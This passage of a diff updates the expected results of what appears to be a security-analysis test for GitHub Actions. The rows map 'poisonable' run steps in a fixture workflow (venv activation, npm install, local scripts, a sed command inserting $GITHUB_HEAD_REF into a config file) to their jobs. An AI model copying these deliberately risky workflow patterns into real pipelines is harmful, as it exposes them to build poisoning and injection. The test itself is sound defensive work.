.github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed 